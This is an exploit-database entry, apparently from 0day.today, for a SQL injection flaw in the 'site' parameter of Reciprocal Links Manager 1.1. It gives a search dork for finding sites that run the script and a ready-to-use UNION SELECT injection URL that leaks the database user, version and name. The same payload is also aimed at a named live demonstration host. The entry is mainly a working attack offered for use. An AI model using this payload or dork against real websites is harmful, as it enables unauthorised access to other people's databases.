id: 3587
date: 09/01/2008
title: Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability
author: Hussin X
cves: 

===============================================================
Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability
===============================================================



|___________________________________________________|
|
| Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|___________________________________________________
|                                                   |
|
| script : http://www.sourceworkshop.com/reciprocal_links_manager.html
|
| DorK   : "Powered by Reciprocal Links Manager"
|___________________________________________________|

Exploit:
________



www.[target].com/Script/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--



L!VE DEMO:
_________


http://reciprocal.fastidev.com/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--




#  0day.today [2023-03-27]  #